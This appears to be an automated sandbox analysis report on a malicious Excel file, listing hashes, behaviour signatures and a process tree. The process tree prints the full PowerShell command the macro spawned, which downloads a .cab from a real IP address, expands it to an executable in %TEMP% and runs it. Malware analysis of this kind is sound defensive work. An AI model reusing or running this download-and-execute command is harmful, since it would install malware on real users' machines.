Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2022 16:18

General

  • Target

    f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc.xls

  • Size

    24KB

  • MD5

    f584a24f2423784935912fec4c69cac3

  • SHA1

    6b441f8e8b387c0cf55f42a459bc1b6b475df097

  • SHA256

    f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc

  • SHA512

    9c9954a9537902119077f0278046b2dc5387f950bffc304d4c8c13189532b56b257ce6f89c9b7ddf5e123dc15c4b7c0a339d3e2d884dd8a3e7b7973be4cbab08

  • SSDEEP

    192:pBgqHa439gyLPUV+/T/D/199huyDycjCxGi+yE1fQ/yGCl7sXZBik9VWa9:po+LbthuQbCIia1fCz

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://92.63.88.87/sdeoefefs/dfssk.cab

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.cab'); expand C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.cab C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.exe; start C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.exe;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\system32\expand.exe
          "C:\Windows\system32\expand.exe" C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.cab C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.exe
          4⤵
            PID:2732

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2688-132-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-133-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-134-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-135-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-136-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-137-0x00007FF979000000-0x00007FF979010000-memory.dmp

      Filesize

      64KB

    • memory/2688-138-0x00007FF979000000-0x00007FF979010000-memory.dmp

      Filesize

      64KB

    • memory/2688-150-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-149-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-148-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2688-147-0x00007FF97B4F0000-0x00007FF97B500000-memory.dmp

      Filesize

      64KB

    • memory/2732-144-0x0000000000000000-mapping.dmp

    • memory/3760-139-0x0000000000000000-mapping.dmp

    • memory/4700-143-0x00007FF992B30000-0x00007FF9935F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4700-145-0x00007FF992B30000-0x00007FF9935F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4700-142-0x00007FF992B30000-0x00007FF9935F1000-memory.dmp

      Filesize

      10.8MB

    • memory/4700-141-0x00000215F0FD0000-0x00000215F0FF2000-memory.dmp

      Filesize

      136KB

    • memory/4700-140-0x0000000000000000-mapping.dmp